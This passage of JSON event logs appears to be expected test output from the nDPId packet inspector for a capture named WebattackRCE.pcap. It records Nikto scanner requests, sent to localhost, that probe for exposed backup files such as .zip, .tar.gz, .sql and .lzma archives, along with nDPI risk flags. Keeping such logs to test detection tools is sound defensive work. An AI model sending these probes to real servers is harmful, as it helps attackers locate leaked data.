(Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":1,"flow_last_seen":1576420277249,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277249,"pkt":"AAAAAAAAAAAAAAAACABFAADDeldAAEAGwdt\/AAABfwAAAcRgH5A4o0L2zMH\/yIAYAED+twAAAQEICp1m\/SmdZv0pR0VUIC8xMjcuMC4wLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":1576420277252,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277252,"pkt":"AAAAAAAAAAAAAAAACABFAADCJxNAAEAGFSF\/AAABfwAAAcRiH5BR2x+x8C2V44AYAED+tgAAAQEICp1m\/SydZv0rR0VUIC8xMjcudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":1576420277253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277253,"pkt":"AAAAAAAAAAAAAAAACABFAADClhFAAEAGpiJ\/AAABfwAAAcRkH5B3iK6vsi1CtIAYAED+tgAAAQEICp1m\/S2dZv0tR0VUIC8xMjcudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":1,"flow_last_seen":1576420277255,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277255,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/zTlAAEAGbv1\/AAABfwAAAcRmH5BLoPWWHSfpPoAYAED+swAAAQEICp1m\/S+dZv0vR0VUIC8xMjcuZWdnIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":1576420277258,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277258,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/W9xAAEAG4Fp\/AAABfwAAAcRoH5D01mN5gVzP14AYAED+swAAAQEICp1m\/TKdZv0yR0VUIC8xMjcuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":1576420277260,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277260,"pkt":"AAAAAAAAAAAAAAAACABFAADF4tJAAEAGWV5\/AAABfwAAAcRqH5C3Btp0g+NrSIAYAED+uQAAAQEICp1m\/TSdZv00R0VUIC8xMjdfMF8wXzEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":1576420277261,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277261,"pkt":"AAAAAAAAAAAAAAAACABFAADFGk1AAEAGIeR\/AAABfwAAAcRsH5AZ8SLp80IPEIAYAED+uQAAAQEICp1m\/TWdZv01R0VUIC8xMjdfMF8wXzEuemlwIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":1,"flow_last_seen":1576420277263,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277263,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/qndAAEAGkb9\/AAABfwAAAcRuH5AQK5LXaKY1oYAYAED+swAAAQEICp1m\/TadZv02R0VUIC8xMjcuc3FsIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":1,"flow_last_seen":1576420277264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277264,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/DxVAAEAGLSJ\/AAABfwAAAcRwH5D+vze4KlHK9oAYAED+swAAAQEICp1m\/TidZv04R0VUIC8xMjcuc3FsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":1576420277266,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277266,"pkt":"AAAAAAAAAAAAAAAACABFAADKoqhAAEAGmYN\/AAABfwAAAcRyH5D4dpoDoX2CwIAYAED+vgAAAQEICp1m\/TqdZv06R0VUIC8xMjdfMF8wXzEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":1576420277268,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277268,"pkt":"AAAAAAAAAAAAAAAACABFAADKWilAAEAG4gJ\/AAABfwAAAcR0H5DTe2KDABhOQYAYAED+vgAAAQEICp1m\/TydZv08R0VUIC8xMjdfMF8wXzEudGFyLmx6bWEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277268,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 